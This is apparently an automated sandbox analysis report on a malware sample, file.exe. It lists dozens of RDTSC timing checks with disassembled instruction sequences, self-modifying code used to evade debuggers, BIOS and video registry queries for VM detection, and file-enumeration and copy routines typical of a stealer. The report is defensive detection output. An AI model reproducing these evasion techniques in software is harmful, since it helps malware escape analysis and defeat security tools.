                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC568 second address: 5AC5F2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF86F4E96h 0x00000008 jmp 00007F2AF86F4E9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2AF86F4EA8h 0x00000014 jmp 00007F2AF86F4EA9h 0x00000019 jmp 00007F2AF86F4EA3h 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 jmp 00007F2AF86F4E9Eh 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 jbe 00007F2AF86F4EA7h 0x0000002f jmp 00007F2AF86F4EA1h 0x00000034 push eax 0x00000035 push edx 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC743 second address: 5AC762 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AF93CAABEh 0x00000008 push ebx 0x00000009 jns 00007F2AF93CAAB6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC762 second address: 5AC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AF86F4E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC76C second address: 5AC79C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F2AF93CAAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2AF93CAAC4h 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F2AF93CAAB6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC92F second address: 5AC933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC933 second address: 5AC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC937 second address: 5AC93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC93D second address: 5AC943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B429A second address: 5B42A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B42A0 second address: 5B42A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3F83 second address: 5B3F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2AF86F4E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3F8D second address: 5B3FA5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d je 00007F2AF93CAAB8h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3FA5 second address: 5B3FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6831 second address: 5B684E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AF93CAAB6h 0x0000000a popad 0x0000000b js 00007F2AF93CAAC2h 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B684E second address: 5B6891 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF86F4EA8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F2AF86F4ED2h 0x00000016 jmp 00007F2AF86F4EA3h 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F2AF86F4E96h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3285 second address: 5C3289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C3289 second address: 5C32B0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2AF86F4E96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F2AF86F4EA7h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C32B0 second address: 5C32D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F2AF93CAAB6h 0x00000009 jmp 00007F2AF93CAABAh 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F2AF93CAAB6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C605A second address: 5C6060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6060 second address: 5C6064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5C0F second address: 5C5C1B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AF86F4E9Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDB25 second address: 5CDB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC6h 0x00000009 popad 0x0000000a jl 00007F2AF93CAAB8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBA2 second address: 5DEBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2AF86F4EA7h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2AF86F4EA4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBD4 second address: 5DEBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEBD8 second address: 5DEBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD418 second address: 5DD41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD9ED second address: 5DDA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2AF86F4EA5h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDA0B second address: 5DDA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDCAC second address: 5DDCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDCB0 second address: 5DDCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABEh 0x00000007 jp 00007F2AF93CAAB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2AF93CAAC3h 0x00000016 push ecx 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDCE3 second address: 5DDCE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDCE8 second address: 5DDCF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jg 00007F2AF93CAAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE820 second address: 5DE824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE824 second address: 5DE833 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F2AF93CAAB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE833 second address: 5DE83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE83A second address: 5DE855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2AF93CAAC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE855 second address: 5DE85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5545 second address: 4F5557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5557 second address: 4F555D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F555D second address: 4F5562 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3C7D second address: 5E3C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E64C3 second address: 5E64EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF93CAAC4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E64EB second address: 5E6513 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AF86F4EACh 0x00000008 jne 00007F2AF86F4E96h 0x0000000e jmp 00007F2AF86F4EA0h 0x00000013 jc 00007F2AF86F4E9Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC9BE second address: 5EC9E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2AF93CAACAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC9E2 second address: 5EC9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF13F second address: 5EF144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF144 second address: 5EF14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60262A second address: 602631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602631 second address: 60264B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jo 00007F2AF86F4E96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603E32 second address: 603E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 603E38 second address: 603E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F2AF86F4E96h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60726F second address: 607273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607273 second address: 607279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 607279 second address: 60727E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6073BA second address: 6073BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6073BE second address: 6073C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6073C4 second address: 6073DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F2AF86F4E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6073DC second address: 60740A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F2AF93CAAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2AF93CAAC5h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 jng 00007F2AF93CAAB6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616D63 second address: 616D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6176C2 second address: 6176C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6176C9 second address: 6176E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AF86F4E98h 0x00000008 pushad 0x00000009 jmp 00007F2AF86F4E9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617821 second address: 617855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2AF93CAAC2h 0x0000000e jbe 00007F2AF93CAAB6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6179C5 second address: 6179D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2AF86F4E9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD1B second address: 61AD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAABFh 0x00000009 popad 0x0000000a jmp 00007F2AF93CAAC8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F2AF93CAABEh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F2AF93CAAB8h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C1CF second address: 61C1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C1D3 second address: 61C209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC1h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F2AF93CAAC5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C209 second address: 61C20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C20D second address: 61C22A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C22A second address: 61C241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F2AF86F4E9Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C241 second address: 61C245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C245 second address: 61C254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jne 00007F2AF86F4E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DFDD second address: 61E004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007F2AF93CAAC3h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2AF93CAABAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FABE second address: 61FAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0022B second address: 4D00246 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00246 second address: 4D0025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0025E second address: 4D002C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d pushfd 0x0000000e jmp 00007F2AF93CAAC9h 0x00000013 sbb ax, A676h 0x00000018 jmp 00007F2AF93CAAC1h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F2AF93CAABEh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2AF93CAAC7h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D002C7 second address: 4D002DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00358 second address: 4D003C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2AF93CAAC0h 0x00000009 or ax, 8F78h 0x0000000e jmp 00007F2AF93CAABBh 0x00000013 popfd 0x00000014 jmp 00007F2AF93CAAC8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov di, 0B84h 0x00000022 pushfd 0x00000023 jmp 00007F2AF93CAABDh 0x00000028 and al, FFFFFFC6h 0x0000002b jmp 00007F2AF93CAAC1h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D003C9 second address: 4D003DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3818B9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3818DF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 553C45 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00134910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0012DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0012E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0012ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00134570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0012BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00133EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00121160 GetSystemInfo,ExitProcess,0_2_00121160
